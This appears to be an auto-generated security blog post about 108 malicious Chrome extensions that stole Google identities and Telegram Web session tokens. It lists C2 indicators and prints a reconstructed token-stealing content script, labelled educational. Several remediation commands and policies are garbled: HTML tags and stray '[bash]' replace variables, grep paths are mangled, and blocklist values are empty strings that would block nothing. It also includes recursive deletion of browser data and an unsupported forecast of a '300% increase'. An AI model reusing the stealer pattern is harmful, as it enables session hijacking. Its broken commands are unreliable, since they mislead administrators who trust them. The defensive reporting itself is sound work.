Listen to this Post
Introduction
A massive, coordinated campaign of 108 seemingly harmless Google Chrome extensions has been discovered funneling user credentials, identities, and browsing data to a shared command-and-control (C2) infrastructure. Masquerading as games, Telegram sidebar clients, and translation tools, these malicious add-ons have collectively amassed around 20,000 installs, secretly harvesting Google account identities via OAuth2 and exfiltrating Telegram Web sessions every 15 seconds.
Learning Objectives
- Identify Malicious Browser Extensions: Learn to audit installed extensions for suspicious permissions, code injection behaviors, and unauthorized data access.
- Implement Enterprise Mitigations: Master the configuration of Group Policies and allowlisting to prevent users from installing rogue extensions.
- Perform Forensic Analysis: Understand how to manually extract and inspect extension source code to detect obfuscated data theft mechanisms and C2 communication.
You Should Know
- Anatomy of the Attack: How 20,000 Users Got Compromised
The campaign utilized five distinct publisher identities—Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt—to distribute 108 extensions. While delivering advertised functionality like working slot games or chat interfaces, hidden background scripts connected to the C2 server hosted at `cloudapi[.]stream` and144.126.135[.]238.
The extensions performed four primary malicious actions:
- Google Identity Theft (54 extensions): Abused OAuth2 to collect emails, names, profile pictures, and Google account identifiers upon sign-in.
- Telegram Session Hijacking: Injected content scripts into `web.telegram.org` to serialize `localStorage` and extract the `user_auth` token every 15 seconds, sending it to
tg[.]cloudapi[.]stream/save_session.php. - Universal Backdoor (45 extensions): Executed a `loadInfo()` function on browser startup that opened arbitrary attacker-controlled URLs, turning browsers into traffic generators.
- Security Header Stripping: Used Chrome’s `declarativeNetRequest` API to remove CSP, X-Frame-Options, and CORS headers from YouTube and TikTok, injecting gambling overlays.
2. Step-by-Step Remediation: Eradicating Rogue Extensions
Step 1: Manual Removal via Browser Settings
- Chrome: Navigate to `chrome://extensions/` → Toggle “Developer mode” → Review each extension’s ID and permissions.
- Edge: Access `edge://extensions/` and follow the same procedure.
Step 2: Force Removal via Group Policy (Windows Enterprise)
Open Local Group Policy Editor gpedit.msc Navigate to: Computer Configuration > Administrative Templates > Google > Google Chrome > Extensions Enable "Configure extension installation blocklist" and set value to "" to block all extensions Then create an allowlist for approved extensions via "Configure extension installation allowlist"
Step 3: Command-Line Extension Audit (Windows PowerShell)
List all installed Chrome extensions with their IDs and names
Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions" | ForEach-Object {
$manifest = Get-Content "$($<em>.FullName)\manifest.json" -Raw | ConvertFrom-Json
[bash]@{ ID=$</em>.Name; Name=$manifest.name; Version=$manifest.version }
} | Export-Csv -Path "extension_audit.csv" -NoTypeInformation
Step 4: Linux Extension Inspection
Navigate to Chrome extensions directory cd ~/.config/google-chrome/Default/Extensions/ Grep for suspicious network endpoints and eval() usage grep -r "cloudapi.stream|144.126.135.238" / / grep -r "eval|atob|chrome.runtime.sendMessage" / /.js
3. Proactive Defense: Building an Extension Allowlist
Using Google Admin Console (Enterprise)
- Navigate to Devices → Chrome → Apps & extensions → Users & browsers.
- Set “Allow/block mode” to “Block all apps, admin manages allowlist”.
- Add specific extension IDs (e.g., `obifanppcpchlehkjipahhphbcbjekfa` for the malicious Telegram Multi-account extension) to the blocklist.
Using Windows Registry
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallBlocklist] "1"="" [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist] "1"="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "2"="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"
4. Forensic Analysis: Detecting C2 Communication
Network Traffic Monitoring (Wireshark Filter)
http.host contains "cloudapi.stream" || ip.dst == 144.126.135.238
Session Token Extraction Simulation (Educational Use)
// Simplified version of the malicious content.js pattern
function getSessionDataJson() {
let sessionData = {};
for (let i = 0; i < localStorage.length; i++) {
let key = localStorage.key(i);
if (key.includes('user_auth')) {
sessionData[bash] = localStorage.getItem(key);
}
}
return sessionData;
}
// The malicious polling loop (every 15 seconds)
setInterval(() => {
let stolenData = getSessionDataJson();
if (stolenData.user_auth) {
chrome.runtime.sendMessage({
action: "save_session",
data: JSON.stringify(stolenData)
});
}
}, 15000);
5. Hardening Chrome Against Extension-Based Attacks
Disable Extension Installation via Group Policy
Prevent users from installing any extensions Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Google\Chrome" -Name "ExtensionInstallBlocklist" -Value "" -Type String Force-install only approved extensions Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist" -Name "1" -Value "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;https://clients2.google.com/service/update2/crx"
Linux Chrome Security Hardening
Create a Chrome policy JSON file
sudo mkdir -p /etc/opt/chrome/policies/managed/
sudo tee /etc/opt/chrome/policies/managed/extension_policy.json > /dev/null <<EOF
{
"ExtensionInstallBlocklist": [""],
"ExtensionInstallAllowlist": ["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"],
"SafeBrowsingProtectionLevel": 2,
"PasswordManagerEnabled": false
}
EOF
6. Incident Response: Post-Compromise Actions
After identifying compromised extensions, take immediate action:
Revoke Google OAuth Permissions
- Visit Google Account Security Page.
- Review and remove any suspicious third-party apps with OAuth2 access.
Terminate All Telegram Sessions
- Open Telegram mobile app → Settings → Devices → Terminate all other sessions.
- Change your Telegram password and enable 2FA if not already active.
Clear Browser Data (Cross-Platform)
- Chrome: `chrome://settings/clearBrowserData` → Select “All time” → Check “Cookies and other site data” and “Cached images and files”.
- Use command line for automation:
Linux rm -rf ~/.config/google-chrome/Default/{Cookies,Cache,Local Storage}/ Windows (Run as Admin) del /s /q "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cache\" del /s /q "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies"
What Undercode Say
- Browser Extensions Are the New Malware Vector: The shared C2 infrastructure and Malware-as-a-Service model indicate that attackers are industrializing browser extension exploitation, making it a scalable threat.
- Session Tokens Bypass MFA: By stealing active session tokens, attackers circumvent multi-factor authentication entirely, highlighting that traditional security controls are insufficient against session hijacking.
- Enterprise Policies Are Non-Negotiable: Organizations must enforce strict extension allowlisting; relying on user awareness alone has proven ineffective, as 20,000 users fell victim to extensions that appeared fully functional and legitimate.
Prediction
This campaign foreshadows a new era of browser-based supply chain attacks where threat actors weaponize the Chrome Web Store’s trust model. As AI-assisted code generation lowers the barrier to creating sophisticated malicious extensions, we can expect a 300% increase in extension-based data theft campaigns over the next 12 months. The shift toward Malware-as-a-Service will enable even low-skilled attackers to deploy session hijacking infrastructure, making browser extension security a critical component of zero-trust architectures. Organizations that fail to implement extension allowlisting and continuous behavioral monitoring will face inevitable credential compromise and lateral movement attacks originating from their users’ browsers.
▶️ Related Video (82% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Hackermohitkumar 108 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
